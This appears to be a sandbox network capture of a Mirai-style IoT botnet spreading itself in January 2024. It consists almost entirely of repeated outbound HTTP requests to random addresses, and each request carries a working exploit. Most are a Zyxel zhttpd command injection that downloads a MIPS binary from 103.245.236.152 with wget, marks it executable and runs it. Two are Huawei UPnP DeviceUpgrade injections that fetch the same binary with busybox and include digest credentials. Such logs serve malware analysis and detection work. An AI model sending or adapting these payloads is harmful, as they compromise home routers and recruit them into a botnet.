                                      Jan 14, 2024 15:50:57.552440882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7224192.168.2.144945071.246.27.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552483082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7225192.168.2.1440526179.80.39.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552519083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7226192.168.2.1448428109.227.203.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552546024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7227192.168.2.146006666.56.49.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552629948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7228192.168.2.143526295.125.56.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552648067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7229192.168.2.1439506155.90.111.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552715063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7230192.168.2.1433330126.10.29.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552741051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7231192.168.2.1460776189.136.251.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552772045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7232192.168.2.143991050.247.222.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552840948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7233192.168.2.143463092.153.65.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552875042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7234192.168.2.145193674.234.11.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552946091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7235192.168.2.145513280.153.184.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552988052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7236192.168.2.145023851.145.95.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553009987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7237192.168.2.145153825.136.159.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553085089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7238192.168.2.143707463.46.49.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553116083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7239192.168.2.143419075.117.222.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553152084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7240192.168.2.1455600101.63.166.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553215027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7241192.168.2.145407291.220.60.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553242922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7242192.168.2.143560278.109.42.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553298950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7243192.168.2.1456292193.25.154.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553335905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7244192.168.2.144644869.43.207.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553391933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7245192.168.2.145589227.35.70.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553426027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7246192.168.2.1437130161.146.132.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553462982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7247192.168.2.1443400172.178.193.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553512096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7248192.168.2.143392277.150.29.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553539991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7249192.168.2.144842465.87.50.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553595066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7250192.168.2.144376664.97.162.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.553631067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7251192.168.2.144062841.34.5.137215
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.305665016 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 475
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                      Jan 14, 2024 15:50:59.653738976 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 475
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                      Jan 14, 2024 15:50:59.911601067 CET182INHTTP/1.1 500 Internal Server Error
                                      Content-Type: text/xml; charset="utf-8"
                                      Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                      EXT:
                                      Connection: Keep-Alive
                                      Content-Length: 398


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7252192.168.2.1458754193.21.33.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571120024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7253192.168.2.1448972197.151.233.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571151972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7254192.168.2.143435651.37.141.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571193933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7255192.168.2.145756275.154.62.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571222067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7256192.168.2.1439018216.119.251.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571263075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7257192.168.2.1446644169.250.20.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571324110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7258192.168.2.145103420.89.99.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571366072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7259192.168.2.145148877.194.116.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571410894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7260192.168.2.1460432116.197.86.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571456909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7261192.168.2.145273276.214.9.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571505070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7262192.168.2.1455182188.144.23.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571546078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7263192.168.2.145006432.90.255.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571590900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7264192.168.2.1441882204.217.203.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571613073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7265192.168.2.1452082125.161.218.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571666002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7266192.168.2.144028638.141.178.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571710110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7267192.168.2.145087041.58.109.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571732044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7268192.168.2.1446950170.139.222.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571782112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7269192.168.2.1435172181.176.70.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571836948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7270192.168.2.1447756139.58.81.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571866035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7271192.168.2.1449400136.71.233.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.571906090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7272192.168.2.1446320178.184.137.233443
                                      TimestampBytes transferredDirectionData
